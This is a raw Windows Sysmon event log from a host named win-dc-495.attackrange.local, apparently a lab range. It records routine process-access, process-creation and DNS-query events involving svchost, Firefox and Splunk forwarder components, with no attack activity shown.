14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.628{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.488{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000017906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.382{59A5CD1D-8E56-6005-2E00-00000000A301}246439.100.215.91.in-addr.arpa.0type: 12 script4.ioam.de;C:\Windows\sysmon64.exe 22542200x800000000000000017905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.556{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net02600:9000:21a1:c800:13:7ad6:7840:21;2600:9000:21a1:d000:13:7ad6:7840:21;2600:9000:21a1:dc00:13:7ad6:7840:21;2600:9000:21a1:1600:13:7ad6:7840:21;2600:9000:21a1:1e00:13:7ad6:7840:21;2600:9000:21a1:5e00:13:7ad6:7840:21;2600:9000:21a1:6a00:13:7ad6:7840:21;2600:9000:21a1:b400:13:7ad6:7840:21;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.868{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.865{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.864{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.852{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.772{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.759{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1016ae2|C:\Program Files\Mozilla Firefox\xul.dll+2bc816d|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.706{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+11c31bc|C:\Program Files\Mozilla Firefox\xul.dll+f7d0bf|C:\Program Files\Mozilla Firefox\xul.dll+f7420a|C:\Program Files\Mozilla Firefox\xul.dll+2259d90|C:\Program Files\Mozilla Firefox\xul.dll+226f63a|C:\Program Files\Mozilla Firefox\xul.dll+2252f19|C:\Program Files\Mozilla Firefox\xul.dll+2252c53|C:\Program Files\Mozilla Firefox\xul.dll+2256ba0|C:\Program Files\Mozilla Firefox\xul.dll+226bd4d|C:\Program Files\Mozilla Firefox\xul.dll+2275208|C:\Program Files\Mozilla Firefox\xul.dll+2274234|C:\Program Files\Mozilla Firefox\xul.dll+225db83|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x800000000000000017965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.702{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.523{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.522{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.521{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.520{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.376{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.516{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.504{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.435{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 